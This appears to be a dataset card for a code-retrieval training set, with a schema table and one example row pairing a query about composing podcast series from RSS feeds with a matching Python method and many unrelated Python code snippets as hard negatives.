**Dataset schema**

| Field | Type | Range |
|---|---|---|
| `query` | string | 9-3.4k chars |
| `document` | string | 9-87.4k chars |
| `metadata` | dict | n/a |
| `negatives` | list of strings | 4-101 items |
| `negative_scores` | list | 4-101 items |
| `document_score` | string | 3-10 chars |
| `document_rank` | string | one of 102 distinct values |
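To make the schema concrete, the sketch below loads and inspects one row with the Hugging Face `datasets` library. The repo id is a placeholder assumption, not the dataset's actual name; substitute the real one.

```python
# Minimal sketch: load and inspect one row of this retrieval dataset.
# "your-org/code-retrieval-triplets" is a placeholder (assumption).
from datasets import load_dataset

ds = load_dataset("your-org/code-retrieval-triplets", split="train")
row = ds[0]

print(row["query"])                # natural-language task description
print(row["document"][:300])       # the matching (positive) code snippet
print(len(row["negatives"]))       # 4-101 hard-negative snippets
print(row["negative_scores"][:5])  # relevance scores aligned with negatives
print(row["document_score"], row["document_rank"])
```

An example row follows.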
**query**

> Run the task compose full series + add to our results
**document**

```python
def run(self):
    while self.i < len(self.series):
        # Grab line + RSS
        s = self.series[self.i]
        rss = self.request_rss(s.feedUrl)

        # Compose Episodes
        ep_dicts = []
        for entry in rss['entries']:
            ep_dicts.append(Episode(s, entry).__dict__)

        # Build result dict
        result_dict = dict()
        result_dict['series'] = deepcopy(s.__dict__)
        result_dict['series']['genres'] = \
            result_dict['series']['genres'].split(';')
        result_dict['series']['type'] = 'series'
        result_dict['episodes'] = ep_dicts

        # Store podcast
        self.storer.store(result_dict)

        # Move onto the next one
        self.i += 20
        print("Retrieved " + str(s.id))
```
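For reference, the record this method hands to `self.storer.store` has the shape below, reconstructed from the code above; the field values are illustrative, not taken from the dataset.

```python
# Shape of the stored record (values illustrative, derived from run() above).
result_dict = {
    'series': {
        # ...every attribute of the Series object, plus:
        'genres': ['Comedy', 'News'],  # the ';'-separated string, split
        'type': 'series',
    },
    'episodes': [
        # one dict per RSS entry, built via Episode(s, entry).__dict__
    ],
}
```

The `self.i += 20` stride suggests the method runs on one of several workers that each take every twentieth series (an inference, not stated in the snippet).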
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def execute_series(self):\n for n in xrange(self.conf[\"n_runs\"]):\n self.runs[n].execute()", "def run(self):\n if self.task == 'all':\n self.produce_all_term_data()\n else:\n self.produce_next_term_data()", "def run(self):\n import sacc\n import healpy\n import treecorr\n # Load the different pieces of data we need into\n # one large dictionary which we accumulate\n data = {}\n self.load_tomography(data)\n self.load_shear_catalog(data)\n self.load_random_catalog(data)\n # This one is optional - this class does nothing with it\n self.load_lens_catalog(data)\n # Binning information\n self.read_nbin(data)\n\n # Calculate metadata like the area and related\n # quantities\n meta = self.calculate_metadata(data)\n\n # Choose which pairs of bins to calculate\n calcs = self.select_calculations(data)\n\n sys.stdout.flush()\n \n # This splits the calculations among the parallel bins\n # It's not necessarily the most optimal way of doing it\n # as it's not dynamic, just a round-robin assignment,\n # but for this case I would expect it to be mostly fine\n results = []\n for i,j,k in self.split_tasks_by_rank(calcs):\n results += self.call_treecorr(data, i, j, k)\n\n # If we are running in parallel this collects the results together\n results = self.collect_results(results)\n\n # Save the results\n if self.rank==0:\n self.write_output(data, meta, results)", "async def allseries(self, ctx):\n\n await self.all_series_db.call(ctx)", "def reduce_run():", "def tasks():", "def run(self, input_time_series=None, num_iter=None, record=False,\n output=False):\n pass", "async def update_series(self):\n log.info('Updating all series')\n await self.updater.update_series()\n log.info('Done updating all series')", "def task():", "def process(self, results):\n raise NotImplementedError", "async def _analyze(self) -> Report:\n forecasts = []\n daily = []\n hourly = []\n for data in self._series:\n model = await self._build_model(data=data)\n future = await self._forecast_single(model=model)\n h, d = await self._process_trends_single(future=future)\n forecasts.append(Timeseries.from_df(\n name=data.get_name() + '_forecast',\n df=future,\n time_col='ds',\n val_col='yhat',\n ))\n daily.append(d)\n hourly.append(h)\n daily_agg = pd.concat(daily).groupby(level=0).mean()\n hourly_agg = pd.concat(hourly).groupby(level=0).mean()\n return Report(\n forecasts=forecasts,\n daily_trend=Trend(trend_vals=daily_agg.to_dict()),\n hourly_trend=Trend(trend_vals=hourly_agg.to_dict()),\n )", "def run(self):\r\n self.collect_data()", "def result(self):\n\n chart_series = [] # will hold all the series created\n\n # determine the sensor to plot from the sensor selected by the user.\n the_sensor = bmsapp.models.Sensor.objects.get(pk=self.request_params['select_sensor'])\n\n # get the requested averaging interval in hours\n averaging_hours = float(self.request_params['averaging_time'])\n\n # determine the start time for selecting records\n st_ts, end_ts = self.get_ts_range()\n\n # get the database records\n df = self.reading_db.dataframeForOneID(the_sensor.sensor_id, st_ts, end_ts, pytz.timezone(self.timezone))\n\n if not df.empty:\n\n # info needed to create each series (selection list, series name, visible)\n if self.schedule:\n occupied_times = df.ts.apply(self.schedule.is_occupied)\n unoccupied_times = -occupied_times\n\n series_info = [(None, 'All Data', True),\n (occupied_times, 'Occupied Periods', False),\n (unoccupied_times, 'Unoccupied Periods', False)]\n else:\n # no schedule, so just return the 'All Data' series\n series_info = 
[(None, 'All Data', True)]\n\n for mask, series_name, visibility in series_info:\n if mask is None:\n select_df = df\n else:\n select_df = df[mask]\n\n if averaging_hours:\n select_df = bmsapp.data_util.resample_timeseries(select_df, averaging_hours)\n\n histogram_series = bmsapp.data_util.histogram_from_series(select_df.val)\n\n chart_series.append({'x': [x for x,y in histogram_series],\n 'y': [y for x,y in histogram_series],\n 'type': 'scatter',\n 'mode': 'lines', \n 'name': series_name, \n 'visible': 'true' if visibility else 'legendonly'\n })\n\n opt = self.get_chart_options('plotly')\n opt['data'] = chart_series\n opt['layout']['title'] = the_sensor.title + ' Histogram: ' + self.building.title\n opt['layout']['xaxis']['title'] = the_sensor.unit.label\n opt['layout']['xaxis']['type'] = 'linear'\n opt['layout']['yaxis']['title'] = '% of Readings'\n opt['layout']['yaxis']['rangemode'] = 'tozero'\n\n html = basechart.chart_config.chart_container_html(opt['layout']['title'])\n\n return {'html': html, 'objects': [('plotly', opt)]}", "def final_series():\n tickers = pd.read_excel(os.path.abspath(os.path.dirname(__file__)) +\"./codigos.xlsx\", \n header=[0]).values.flatten()\n # tickers = pd.read_excel(\"./codigos.xlsx\", \n # header=[0]).values.flatten()\n ls = fetch_series(list(set(tickers)))\n net_series = [s for s in ls if _cleasing(s, [\"D\", \"M\"]) is not None]\n p = os.path.abspath(os.path.dirname(__file__))\n with open(p + \"/series_bcb\", \"wb\") as f:\n pickle.dump(net_series, f)\n # with open(\"./series_bcb\", \"wb\") as f:\n # pickle.dump(net_series, f) ", "def _append_results(self) -> None:\n self._t_mps.compute_traces(self._step, self._process_tensors)\n time = self.time(self._step)\n norm = self._t_mps.get_norm()\n bond_dimensions = self._t_mps.get_bond_dimensions()\n self._results['time'].append(time)\n self._results['norm'].append(norm)\n self._results['bond_dimensions'].append(bond_dimensions)\n for sites, dynamics in self._results['dynamics'].items():\n if isinstance(sites, int):\n sites_list = [sites]\n else:\n sites_list = list(sites)\n dynamics.add(\n time,\n self._t_mps.get_density_matrix(sites_list))\n self._t_mps.clear_traces()", "def task_run_core():\n\n ## initialize parameters\n if task_get_option('format'):\n fmts = task_get_option('format')\n else:\n fmts = 'HB' # default value if no format option given\n for fmt in fmts.split(','):\n last_updated = fetch_last_updated(fmt)\n write_message(\"last stored run date is %s\" % last_updated)\n\n sql = {\n \"all\" : \"\"\"SELECT br.id FROM bibrec AS br, bibfmt AS bf\n WHERE bf.id_bibrec = br.id AND bf.format = '%s'\"\"\" % fmt,\n \"last\": \"\"\"SELECT br.id FROM bibrec AS br\n INNER JOIN bibfmt AS bf ON bf.id_bibrec = br.id\n WHERE br.modification_date >= '%(last_updated)s'\n AND bf.format='%(format)s'\n AND bf.last_updated < br.modification_date\"\"\" \\\n % {'format': fmt,\n 'last_updated': last_updated.strftime('%Y-%m-%d %H:%M:%S')},\n \"missing\" : \"\"\"SELECT br.id\n FROM bibrec as br\n LEFT JOIN bibfmt as bf\n ON bf.id_bibrec = br.id AND bf.format ='%s'\n WHERE bf.id_bibrec IS NULL\n AND br.id BETWEEN %%s AND %%s\n \"\"\" % fmt,\n }\n sql_queries = []\n cds_query = {}\n if task_has_option(\"all\"):\n sql_queries.append(sql['all'])\n if task_has_option(\"last\"):\n sql_queries.append(sql['last'])\n if task_has_option(\"collection\"):\n cds_query['collection'] = task_get_option('collection')\n else:\n cds_query['collection'] = \"\"\n\n if task_has_option(\"field\"):\n cds_query['field'] = 
task_get_option('field')\n else:\n cds_query['field'] = \"\"\n\n if task_has_option(\"pattern\"):\n cds_query['pattern'] = task_get_option('pattern')\n else:\n cds_query['pattern'] = \"\"\n\n if task_has_option(\"matching\"):\n cds_query['matching'] = task_get_option('matching')\n else:\n cds_query['matching'] = \"\"\n\n if task_has_option(\"recids\"):\n recids = split_cli_ids_arg(task_get_option('recids'))\n else:\n recids = []\n\n ### sql commands to be executed during the script run\n ###\n bibreformat_task(fmt, sql, sql_queries, cds_query, task_has_option('without'), not task_has_option('noprocess'), recids)\n return True", "def task(self):", "def task(self):", "def _startLoop(self, tiltseriesdata):\n\t\t#calc series left\n\t\tself.stats['seriesleft'] = self.stats['seriescount'] - self.stats['count']\n\n\t\tif self.params['background'] is False:\n\t\t\tapDisplay.printColor( \"\\nStarting series %d ( skip:%d, remain:%d ) id:%d\"\n\t\t\t\t%(tiltseriesdata['number'], self.stats['skipcount'], self.stats['seriesleft'], \n\t\t\t\ttiltseriesdata.dbid,),\n\t\t\t\t\"green\")\n\t\t#only if a series was processed last\n\t\tif(self.stats['lastcount'] != self.stats['count']):\n\t\t\tsys.stderr.write(\"\\n\")\n\t\t\tself.stats['lastcount'] = self.stats['count']\n\t\t\tself._checkMemLeak()\n\t\t# skip if last image belong to the series doesn't exist:\n\t\timgtree = apDatabase.getImagesFromTiltSeries(tiltseriesdata,False)\n\t\timgpath = os.path.join(tiltseriesdata['session']['image path'], imgtree[0]['filename']+'.mrc')\n\t\tif not os.path.isfile(imgpath):\n\t\t\tapDisplay.printWarning(imgpath+\" not found, skipping\")\n\t\t\treturn False\n\n\t\t# skip if there are some problem with the series\n\t\tif self.__isShortTiltSeries(tiltseriesdata) or self.isBadTiltSeries(tiltseriesdata):\n\t\t\tapDisplay.printWarning(\"Series %d is not good enough for processing, skipping\" % (tiltseriesdata['number']))\n\t\t\tseriesname = \"series%3d\" % (tiltseriesdata['number'])\n\t\t\tself._writeDoneDict(seriesname)\n\t\t\tself.stats['count'] += 1\n\t\t\treturn False\n\n\t\t# check to see if series has already been processed\n\t\tif self._alreadyProcessed(tiltseriesdata):\n\t\t\t\n\t\t\treturn False\n\n\t\tself.stats['waittime'] = 0\n\n\t\tif self.reprocessSeries(tiltseriesdata) is True:\n\t\t\tif self.params['background'] is True:\n\t\t\t\tsys.stderr.write(\",\")\n\t\t\telse:\n\t\t\t\t\"\"\"apDisplay.printMsg(\"reprocessing series %d\" % (tiltseriesdata['number']))\"\"\"\n\t\telse:\n\t\t\tif self.params['background'] is True:\n\t\t\t\tsys.stderr.write(\".\")\n\t\t\telse:\n\t\t\t\t\"\"\"apDisplay.printMsg(\"processing series %d\" % (tiltseriesdata['number']))\"\"\"\n\n\t\treturn True", "def run_crawler(self) -> List[JobEventSchema]:\n print(f\"Ready for scraping, current task: {self.tasks}\")\n\n crawling_result = []\n for task in self.tasks:\n result = task.run()\n crawling_result.extend(result)\n return crawling_result", "def step(self, actions):\n\n representative_data = []\n original_data = []\n\n actions = np.array(actions).reshape(3, -1)\n\n for np_data, df_data, calculator, som, action in zip(self.np_data_list, self.df_data_list, self.calculators, self.som_objects, actions):\n\n representative_days, cluster_numbers = calculator.get_representative_days(\n som, np_data, action)\n\n representative_days = pd.DataFrame(representative_days)\n\n representative_days = self.wide_to_long(representative_days)\n approximation_calc = ApproximateData(df_data, 4)\n representative_days = ApproximateData(df_data, 
4).get_load_duration_curve(\n representative_days, cluster_numbers)\n\n representative_data.append(representative_days)\n\n # original_days = approximation_calc.get_load_duration_curve(\n # year=\"2013\")\n\n\n\n # original_data.append(original_days)\n\n # metrics_calculator = Metrics(original_data[0], representative_data[0], original_data[1],\n # representative_data[1], original_data[2], representative_data[2], \"dc\")\n\n pv_original = pd.read_csv(\n '{}data/processed/resources/pv_processed.csv'.format(project_dir))\n wind_original = pd.read_csv(\n '{}data/processed/resources/onshore_processed.csv'.format(project_dir))\n load_original = pd.read_csv(\n '{}data/processed/demand/load_NG/load_processed_normalised.csv'.format(project_dir))\n\n pv_original_ldcs, wind_original_ldcs, load_original_ldcs = get_each_ldc(pv_original, wind_original, load_original)\n\n multi_year_metrics_calculator = MultiYearMetrics(pv_original_ldcs, representative_data[0], wind_original_ldcs, representative_data[1], load_original_ldcs, representative_data[2], self.year_start)\n multi_year_metrics = multi_year_metrics_calculator.get_multi_year_average_metrics(\"dc\")\n multi_year_metrics = multi_year_metrics.reset_index()\n # logger.debug(\"multi_year_metrics: \\n{}\".format(multi_year_metrics))\n\n nrmse = multi_year_metrics[multi_year_metrics['metric'] == 'nrmse dc'].iloc[0].value\n rae = multi_year_metrics[multi_year_metrics['metric'] == 'rae dc'].iloc[0].value\n correlation = multi_year_metrics[multi_year_metrics['metric'] == 'correlation'].iloc[0].value\n\n # error_metrics = metrics_calculator.get_mean_error_metrics()\n # nrmse = error_metrics.iloc[1].value\n # rae = error_metrics.iloc[2].value\n # correlation = error_metrics.iloc[0].value\n # reward = -error_metrics.value.sum()\n # logger.info(\"error_metrics: {}\".format(error_metrics))\n # logger.info(\"error_metrics: {}\".format(error_metrics.iloc[0]))\n\n # return reward\n return nrmse, rae, correlation", "def contents_build_1(self, **kwargs):\n\n SeriesFilesCount = 10\n for key,val in kwargs.iteritems():\n if key == 'SeriesFilesCount': SeriesFilesCount = val\n\n # First, build a PACS_pull tree\n self.dataComponent_build(\n path = '/',\n plugin = 'PACSPull',\n SeriesFilesCount = SeriesFilesCount\n )\n\n self.dataComponent_pluginBuild(\n path = '/plugins'\n )\n\n\n # Now \"run\" an mri_convert to nifi\n # self.dataComponent_pluginRun(\n # inputPath = '/dataView/files',\n # outputPath = '/plugin/run',\n # plugin = 'mri_convert'\n # )", "def run(self):\n with QAFigure(self.dataset, 'AL52 Carbon Monoxide') as fig:\n\n cal = self.dataset['AL52CO_cal_status'].data.copy()\n _groups = (cal != cal.shift()).cumsum()\n _groups[cal < 1] = np.nan\n _groups.dropna(inplace=True)\n groups = cal.groupby(_groups)\n\n in_cal = self.dataset['AL52CO_cal_status'].data.copy() * 0\n\n for group in groups:\n start = group[1].index[0]\n end = group[1].index[-1] + datetime.timedelta(seconds=CAL_FLUSH_TIME)\n in_cal.loc[start:end] = 1\n\n self.cal = in_cal\n\n self.make_lamptemp(fig)\n self.make_flows(fig)\n self.make_cellpress(fig)\n self.make_co(fig)", "def run(self):\n results = []\n for task in self.tasks:\n results.append(task.run())\n self.tasks = []\n return results", "def compute(self, write_to_tar=True):\n data = self._prep_data(self._get_all_data(self.start_date,\n self.end_date),\n self.var.func_input_dtype)\n logging.info('Computing timeseries for {0} -- '\n '{1}.'.format(self.start_date, self.end_date))\n full, monthly, eddy = self._make_full_mean_eddy_ts(data)\n reduced 
= self._apply_all_time_reductions(full, monthly, eddy)\n logging.info(\"Writing desired gridded outputs to disk.\")\n for dtype_time, data in reduced.items():\n data = _add_metadata_as_attrs(data, self.var.units,\n self.var.description,\n self.dtype_out_vert)\n self.save(data, dtype_time, dtype_out_vert=self.dtype_out_vert,\n save_files=True, write_to_tar=write_to_tar)\n return self", "def prepare_series(self, result_dir):\n output = {}\n output['title'] = self.title\n output['x'] = self.x\n output['y'] = self.y\n output['series'] = []\n for series in self.series:\n idfile = os.path.join(result_dir, 'benchmark_' + str(series['id']) +\n '.json')\n rows = json_from_file(idfile)\n # it is assumed each row has the same names of columns\n keys = rows[0].keys()\n # skip the series if it does not have required keys\n if self.x not in keys or self.y not in keys:\n continue\n points = [[row[self.x], row[self.y]] for row in rows]\n output['series'].append({'label': series['label'], 'points': points})\n # save the series to a file\n series_path = self._series_file(result_dir)\n if os.path.exists(series_path):\n figures = json_from_file(series_path)\n else:\n figures = {}\n figures[self.key] = output\n with open(series_path, 'w') as file:\n json.dump(figures, file, indent=4)\n # mark as done\n self.output['done'] = True", "def run(self):\n # get components list\n #component_id_list = self.getComponentsList()\n asset_id = 3776\n component_id_list = self.get_component_info_for_one_asset(asset_id)\n # call computeResults method\n results = self.compute_results(component_id_list)\n # write to the output file\n self.write_to_file(results)", "def run(self):\n self.evaluate()\n self.accumulate()\n self.summarize()", "def test_sales_forecasting_multiprocessing(self):\n with TemporaryDirectory() as temp_dir:\n self.run_command(\n (\n \"python3 main.py --use-synthetic-data --epochs 1\"\n f\" --mov-mean-window 0 --log-dir {temp_dir}\"\n \" --multiprocessing\"\n ),\n working_path,\n [\n \"Begin training loop\", \"Training:\", r\"epoch:\\s+1\",\n \"Validation:\", \"Best RMSPE|no valid RMSPE results\"\n ]\n )", "def click_time_series_aggregating(output_dir, ignore_cache):\n unit = get_unit_name()\n\n def single_sensor_label_from_topic(topic):\n split_topic = topic.split(\"/\")\n # return f\"{split_topic[1]}-{split_topic[-2]}/{split_topic[-1]}\"\n return f\"{split_topic[1]}-{split_topic[-1]}\"\n\n def unit_from_topic(topic):\n split_topic = topic.split(\"/\")\n return split_topic[1]\n\n raw135 = TimeSeriesAggregation( # noqa: F841\n \"pioreactor/+/+/od_raw/+/+\", # see note above about why we have no filter on experiment\n output_dir,\n experiment=UNIVERSAL_EXPERIMENT,\n job_name=\"od_raw_time_series_aggregating\",\n unit=unit,\n ignore_cache=ignore_cache,\n extract_label=single_sensor_label_from_topic,\n write_every_n_seconds=10,\n time_window_seconds=60\n * int(config[\"ui.overview.settings\"][\"raw_od_lookback_minutes\"]),\n record_every_n_seconds=5,\n )\n\n filtered135 = TimeSeriesAggregation( # noqa: F841\n \"pioreactor/+/+/od_filtered/+/+\",\n output_dir,\n experiment=UNIVERSAL_EXPERIMENT,\n job_name=\"od_filtered_time_series_aggregating\",\n unit=unit,\n ignore_cache=ignore_cache,\n extract_label=single_sensor_label_from_topic,\n write_every_n_seconds=10,\n time_window_seconds=60\n * int(config[\"ui.overview.settings\"][\"filtered_od_lookback_minutes\"]),\n record_every_n_seconds=4,\n )\n\n growth_rate = TimeSeriesAggregation( # noqa: F841\n \"pioreactor/+/+/growth_rate\",\n output_dir,\n 
experiment=UNIVERSAL_EXPERIMENT,\n job_name=\"growth_rate_time_series_aggregating\",\n unit=unit,\n ignore_cache=ignore_cache,\n extract_label=unit_from_topic,\n write_every_n_seconds=10,\n record_every_n_seconds=3 * 60, # TODO: move this to a config param\n )\n\n alt_media_fraction = TimeSeriesAggregation( # noqa: F841\n \"pioreactor/+/+/alt_media_calculating/alt_media_fraction\",\n output_dir,\n experiment=UNIVERSAL_EXPERIMENT,\n job_name=\"alt_media_fraction_time_series_aggregating\",\n unit=unit,\n ignore_cache=ignore_cache,\n extract_label=unit_from_topic,\n write_every_n_seconds=10,\n record_every_n_seconds=1,\n )\n\n while True:\n signal.pause()", "def run(self):\r\n __data__ = abspath(join(dirname( __file__ ), '..', 'data'))\r\n files = [ f for f in listdir(__data__) \r\n if isfile(join(__data__,f)) ]\r\n\r\n # Spawn processes\r\n pids = []\r\n for index, ts_name in enumerate(files):\r\n if ts_name == \".DS_Store\":\r\n \tcontinue\r\n\r\n __data__ = abspath(join(dirname( __file__ ), '..', 'data'))\r\n with open(join(__data__ + \"/\" + ts_name), 'r') as f:\r\n timeseries = json.loads(f.read())\r\n p = Process(target=run_algorithms, args=(timeseries, ts_name))\r\n pids.append(p)\r\n p.start()\r\n\r\n # Send wait signal to zombie processes\r\n for p in pids:\r\n p.join()", "def series_ingestion(series:List[dict]) -> None:\n for srs in series:\n try:\n add_series(\"BCB.\" + str(srs['number']), \n srs['nome'], \n *gestores[srs['gestor']])\n except:\n logger.error(f\"Unable to add series BCB.{srs['number']}\")", "def __call__(self, results):\n\n results = self._mosaic_transform(results)\n return results", "def task_parse_results():\n pass", "def rainfall_series(self):\n\n # assign local temporal variables\n datatype = 'strds'\n increment = str(self.rain_interval)+\" minutes\"\n raster = 'raster'\n rain_excess = 'rain_excess'\n net_difference = 'net_difference'\n #iterations = sum(1 for row in precip)\n\n # create a raster space time dataset\n gscript.run_command(\n 't.create',\n type=datatype,\n temporaltype=self.temporaltype,\n output=self.elevation_timeseries,\n title=self.elevation_title,\n description=self.elevation_description,\n overwrite=True)\n gscript.run_command(\n 't.create',\n type=datatype,\n temporaltype=self.temporaltype,\n output=self.depth_timeseries,\n title=self.depth_title,\n description=self.depth_description,\n overwrite=True)\n gscript.run_command(\n 't.create',\n type=datatype,\n temporaltype=self.temporaltype,\n output=self.erdep_timeseries,\n title=self.erdep_title,\n description=self.erdep_description,\n overwrite=True)\n gscript.run_command(\n 't.create',\n type=datatype,\n temporaltype=self.temporaltype,\n output=self.flux_timeseries,\n title=self.flux_title,\n description=self.flux_description,\n overwrite=True)\n gscript.run_command(\n 't.create',\n type=datatype,\n temporaltype=self.temporaltype,\n output=self.difference_timeseries,\n title=self.difference_title,\n description=self.difference_description,\n overwrite=True)\n\n # register the initial digital elevation model\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.elevation_timeseries,\n maps=self.elevation,\n start=self.start,\n increment=increment,\n flags='i',\n overwrite=True)\n\n # create evolution object\n evol = Evolution(\n elevation=self.elevation,\n precipitation=self.precipitation,\n start=self.start,\n rain_intensity=self.rain_intensity,\n rain_interval=self.rain_interval,\n walkers=self.walkers,\n runoff=self.runoff,\n mannings=self.mannings,\n 
detachment=self.detachment,\n transport=self.transport,\n shearstress=self.shearstress,\n density=self.density,\n mass=self.mass,\n grav_diffusion=self.grav_diffusion,\n erdepmin=self.erdepmin,\n erdepmax=self.erdepmax,\n k_factor=self.k_factor,\n c_factor=self.c_factor,\n m=self.m,\n n=self.n,\n threads=self.threads,\n fill_depressions=self.fill_depressions)\n\n # open txt file with precipitation data\n with open(evol.precipitation) as csvfile:\n\n # check for header\n has_header = csv.Sniffer().has_header(csvfile.read(1024))\n\n # rewind\n csvfile.seek(0)\n\n # skip header\n if has_header:\n next(csvfile)\n\n # parse time and precipitation\n precip = csv.reader(csvfile, delimiter=',', skipinitialspace=True)\n\n # initial run\n initial = next(precip)\n evol.start = initial[0]\n evol.rain_intensity = 'rain_intensity'\n # compute rainfall intensity (mm/hr)\n # from rainfall observation (mm)\n gscript.run_command(\n 'r.mapcalc',\n expression=\"{rain_intensity}\"\n \"={rain_observation}\"\n \"/{rain_interval}\"\n \"*60.\".format(\n rain_intensity=evol.rain_intensity,\n rain_observation=float(initial[1]),\n rain_interval=self.rain_interval),\n overwrite=True)\n\n # determine mode and run model\n if self.mode == \"simwe_mode\":\n (evolved_elevation, time, depth, erosion_deposition,\n difference) = evol.erosion_deposition()\n # remove relative timestamps\n # from r.sim.water and r.sim.sediment\n gscript.run_command(\n 'r.timestamp',\n map=depth,\n date='none')\n gscript.run_command(\n 'r.timestamp',\n map=erosion_deposition,\n date='none')\n\n elif self.mode == \"usped_mode\":\n (evolved_elevation, time, depth, erosion_deposition,\n difference) = evol.usped()\n\n elif self.mode == \"rusle_mode\":\n (evolved_elevation, time, depth, sediment_flux,\n difference) = evol.rusle()\n\n else:\n raise RuntimeError(\n '{mode} mode does not exist').format(mode=self.mode)\n\n # register the evolved maps\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.elevation_timeseries,\n maps=evolved_elevation,\n start=evol.start,\n increment=increment,\n flags='i',\n overwrite=True)\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.depth_timeseries,\n maps=depth,\n start=evol.start,\n increment=increment,\n flags='i',\n overwrite=True)\n try:\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.erdep_timeseries,\n maps=erosion_deposition,\n start=evol.start,\n increment=increment,\n flags='i',\n overwrite=True)\n except (NameError, CalledModuleError):\n pass\n try:\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.flux_timeseries,\n maps=sediment_flux,\n start=evol.start,\n increment=increment,\n flags='i', overwrite=True)\n except (NameError, CalledModuleError):\n pass\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.difference_timeseries,\n maps=difference,\n start=evol.start,\n increment=increment,\n flags='i',\n overwrite=True)\n\n # run the landscape evolution model for each rainfall record\n for row in precip:\n\n # update the elevation\n evol.elevation=evolved_elevation\n\n # update time\n evol.start=row[0]\n\n # compute rainfall intensity (mm/hr)\n # from rainfall observation (mm)\n rain_intensity = 'rain_intensity'\n gscript.run_command(\n 'r.mapcalc',\n expression=\"{rain_intensity}\"\n \"={rain_observation}\"\n \"/{rain_interval}\"\n \"*60.\".format(\n rain_intensity=rain_intensity,\n rain_observation=float(row[1]),\n rain_interval=self.rain_interval),\n overwrite=True)\n\n # derive excess water (mm/hr) from rainfall rate 
(mm/hr)\n # plus the depth (m) per rainfall interval (min)\n gscript.run_command(\n 'r.mapcalc',\n expression=\"{rain_excess}\"\n \"={rain_intensity}\"\n \"+{depth}\"\n \"/1000.\"\n \"/{rain_interval}\"\n \"*60.\".format(\n rain_excess=rain_excess,\n rain_intensity=rain_intensity,\n depth=depth,\n rain_interval=self.rain_interval),\n overwrite=True)\n\n # update excess rainfall\n gscript.run_command(\n 'r.mapcalc',\n expression=\"{rain_intensity} = {rain_excess}\".format(\n rain_intensity='rain_intensity',\n rain_excess=rain_excess),\n overwrite=True)\n evol.rain_intensity = rain_intensity\n\n # determine mode and run model\n if self.mode == \"simwe_mode\":\n (evolved_elevation, time, depth, erosion_deposition,\n difference) = evol.erosion_deposition()\n # remove relative timestamps\n # from r.sim.water and r.sim.sediment\n gscript.run_command(\n 'r.timestamp',\n map=depth,\n date='none')\n gscript.run_command(\n 'r.timestamp',\n map=erosion_deposition,\n date='none')\n\n elif self.mode == \"usped_mode\":\n (evolved_elevation, time, depth, erosion_deposition,\n difference) = evol.usped()\n\n elif self.mode == \"rusle_mode\":\n (evolved_elevation, time, depth, sediment_flux,\n difference) = evol.rusle()\n\n else:\n raise RuntimeError(\n '{mode} mode does not exist').format(mode=self.mode)\n\n # register the evolved maps\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.elevation_timeseries,\n maps=evolved_elevation,\n start=evol.start,\n increment=increment,\n flags='i',\n overwrite=True)\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.depth_timeseries,\n maps=depth,\n start=evol.start,\n increment=increment,\n flags='i',\n overwrite=True)\n try:\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.erdep_timeseries,\n maps=erosion_deposition,\n start=evol.start,\n increment=increment,\n flags='i',\n overwrite=True)\n except (NameError, CalledModuleError):\n pass\n try:\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.flux_timeseries,\n maps=sediment_flux,\n start=evol.start,\n increment=increment,\n flags='i', overwrite=True)\n except (NameError, CalledModuleError):\n pass\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.difference_timeseries,\n maps=difference,\n start=evol.start,\n increment=increment,\n flags='i',\n overwrite=True)\n\n # remove temporary maps\n gscript.run_command(\n 'g.remove',\n type='raster',\n name=['rain_excess'],\n flags='f')\n\n # compute net elevation change\n gscript.run_command(\n 'r.mapcalc',\n expression=\"{net_difference}\"\n \"= {evolved_elevation}-{elevation}\".format(\n net_difference=net_difference,\n elevation=self.elevation,\n evolved_elevation=evol.elevation),\n overwrite=True)\n gscript.write_command(\n 'r.colors',\n map=net_difference,\n rules='-',\n stdin=difference_colors)", "def on_task_input(self, task, config):\n parsed_url = urlparse(config.get('base_url'))\n base_url = '{scheme}://{url}:{port}/api/v2'.format(\n scheme=parsed_url.scheme, url=parsed_url.netloc, port=config.get('port')\n )\n\n body_auth = {'username': config.get('username'), 'password': config.get('password')}\n\n api_key = task.requests.post(f'{base_url}/authenticate', json=body_auth).json()['token']\n\n headers = {'x-auth': 'Bearer ' + api_key}\n\n params = {'limit': 1000}\n\n series = task.requests.get(f'{base_url}/series', params=params, headers=headers).json()\n\n entries = []\n for show in series:\n logger.debug('processing show: {}', show)\n if (\n (show['config']['paused'] and 
config.get('only_monitored'))\n or show['status'] == 'Ended'\n and not config.get('include_ended')\n ):\n logger.debug('discarted show: {}', show)\n\n entry = Entry(title=show['title'], url='', series_name=show['title'])\n\n if entry.isvalid():\n entries.append(entry)\n else:\n logger.error(f'Invalid entry created? {entry}')\n\n return entries", "def result(self):\n\n # determine the X and Y sensors to plot from those sensors selected by the user.\n sensorX = bmsapp.models.Sensor.objects.get(pk=self.request_params['select_sensor_x'])\n sensorY = bmsapp.models.Sensor.objects.get(pk=self.request_params['select_sensor_y'])\n\n # determine the averaging time\n averaging_hours = float(self.request_params['averaging_time_xy'])\n\n # get the building's timezone\n tz = pytz.timezone(self.timezone)\n\n # determine the start and end time for selecting records\n st_ts, end_ts = self.get_ts_range()\n\n # get the dividing date, if there is one\n div_datestring = self.request_params['div_date']\n div_dt = tz.localize(parser.parse(div_datestring)) if len(div_datestring) else None\n\n\n # The list that will hold each series\n series = []\n\n # get the X and Y sensor records and perform the requested averaging\n dfX = self.reading_db.dataframeForOneID(sensorX.sensor_id, st_ts, end_ts, tz)\n dfY = self.reading_db.dataframeForOneID(sensorY.sensor_id, st_ts, end_ts, tz)\n\n if not dfX.empty and not dfY.empty: # both sensors have some data, so proceed to average the data points\n \n dfX = bmsapp.data_util.resample_timeseries(dfX,averaging_hours)\n dfX.rename(columns = {'val':'X'}, inplace = True)\n\n dfY = bmsapp.data_util.resample_timeseries(dfY,averaging_hours)\n dfY.rename(columns = {'val':'Y','ts':'tsY'}, inplace = True)\n\n # Join the X and Y values for the overlapping time intervals and make\n # a list of points.\n df_all = dfX.join(dfY, how='inner') # inner join does intersection of timestamps\n\n # make sure there are matched records before 